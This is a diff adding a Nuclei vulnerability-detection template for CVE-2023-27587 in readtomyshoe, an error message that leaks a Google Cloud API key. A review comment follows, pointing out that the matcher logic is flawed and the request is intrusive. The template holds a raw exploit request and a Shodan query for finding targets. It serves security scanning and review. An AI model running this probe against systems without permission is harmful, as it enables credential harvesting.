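--- a/nuclei-templates/cves/2023/CVE-2023-27587.yaml
+++ b/nuclei-templates/cves/2023/CVE-2023-27587.yaml
@@ -0,0 +1,45 @@
+id: CVE-2023-27587
+
+info:
+name: readtomyshoe - Google Cloud API Disclosure
+author: vagnerd
+severity: high
+description: |
+If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, then it will include the full URL of the request. The request URL contains the Google Cloud API key.
+reference:
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587
+- https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g
+- https://github.com/sec-fx/CVE-2023-27587-PoC
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
+cvss-score: 7.4
+cve-id: CVE-2023-27587
+cwe-id: CWE-209
+metadata:
+shodan-query: http.html:"readtomyshoe" || title:"ReadToMyShoe"
+verified: "true"
+tags: cve,cve2023,leak,debug,readtomyshoe
+
+requests:
+- raw:
+- |
+POST /api/add-article-by-text HTTP/1.1
+Host: {{Hostname}}
+Accept-Encoding: gzip, deflate
+Content-Type: application/json
+
+{
+"title":"Kernsicherheitstest",
+"body":"Kernsicherheitstest"
+}
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 500
+
+- type: dsl
+dsl:
+- '!contains((body), ''https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED'')'
+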
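Review bot: The dsl matcher on new line 44 is purely negative, so combined with the status matcher the template reports any host that answers this POST with a 500 whose body lacks the exact `...key=REDACTED` string, whether or not a key is disclosed at all. A positive check on the leaked request URL would tie the finding to the actual disclosure, for example `- 'contains(body, "texttospeech.googleapis.com/v1beta1/text:synthesize?key=") && !contains(body, "key=REDACTED")'` (the `REDACTED` exclusion presumably reflects what patched versions print; confirm against the advisory). The request also appears to create an article on instances where the TTS call succeeds, so adding `intrusive` to `tags:` would let operators exclude it from passive scans. A true positive places a live Google Cloud API key in the scan output, so results should be handled as secrets and the key rotated.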